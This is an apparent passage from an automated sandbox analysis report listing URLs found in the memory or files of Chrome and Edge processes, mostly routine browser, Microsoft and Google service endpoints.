          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
          Source: HubApps Icons.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
          Source: 000003.log7.20.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://gaana.com/
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/)
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com//
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/3
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/6
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/=
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/D
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/G
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/N
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/Q
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/X
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/b
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/e
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/l
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/o
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/t
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/v
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~
          Source: chrome.exe, 0000000F.00000003.2586517196.000003C801978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
          Source: DJMYUA.11.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
          Source: chrome.exe, 0000000F.00000003.2553158542.000003C80039C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584051051.000003C801D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584141668.000003C801D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
          Source: chrome.exe, 0000000F.00000003.2584080843.000003C801D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584051051.000003C801D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2584141668.000003C801D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
          Source: chrome.exe, 0000000F.00000003.2585255882.000001CC00974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
          Source: chrome.exe, 0000000F.00000003.2542294722.000001CC00878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
          Source: chrome.exe, 0000000F.00000003.2541781232.000001CC0071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.kugou.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.soundcloud.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://m.vk.com/
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
          Source: chrome.exe, 0000000F.00000003.2578653549.000003C801694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577610339.000003C801668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577470556.000003C801658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2577531707.000003C801660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578234940.000003C8015A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552247281.000003C800CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2552400999.000003C800C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557085148.000003C800C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2578550719.000003C800C94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
          Source: chrome.exe, 0000000F.00000003.2583910367.000003C8014E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2591995932.000003C8014E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
          Source: Cookies.22.drString found in binary or memory: https://msn.comXID/
          Source: Cookies.22.drString found in binary or memory: https://msn.comXIDv10
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.amazon.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.apple.com
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://music.yandex.com
          Source: chrome.exe, 0000000F.00000003.2583555211.000003C801874000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
          Source: 000003.log3.20.dr, 2cc80dabc69f58b6_0.20.drString found in binary or memory: https://ntp.msn.com
          Source: Session_13381172587684739.20.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
          Source: msedge.exe, 00000013.00000002.2742749823.000039F8003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
          Source: chrome.exe, 0000000F.00000003.2578550719.000003C800C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
          Source: chrome.exe, 0000000F.00000003.2578323378.000003C8015BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://open.spotify.com
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
          Source: chrome.exe, 0000000F.00000003.2553031453.000003C800A34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/0/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/0/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen9
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
          Source: msedge.exe, 00000013.00000003.2671795095.000039F800284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2671553359.000039F800280000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken9
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000003.2557362056.000003C80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557574273.000003C8012E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2557118101.000003C801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2556904309.000003C801090000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
          Source: chrome.exe, 0000000F.00000003.2555478690.000003C8010E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
          Source: 13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp.20.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
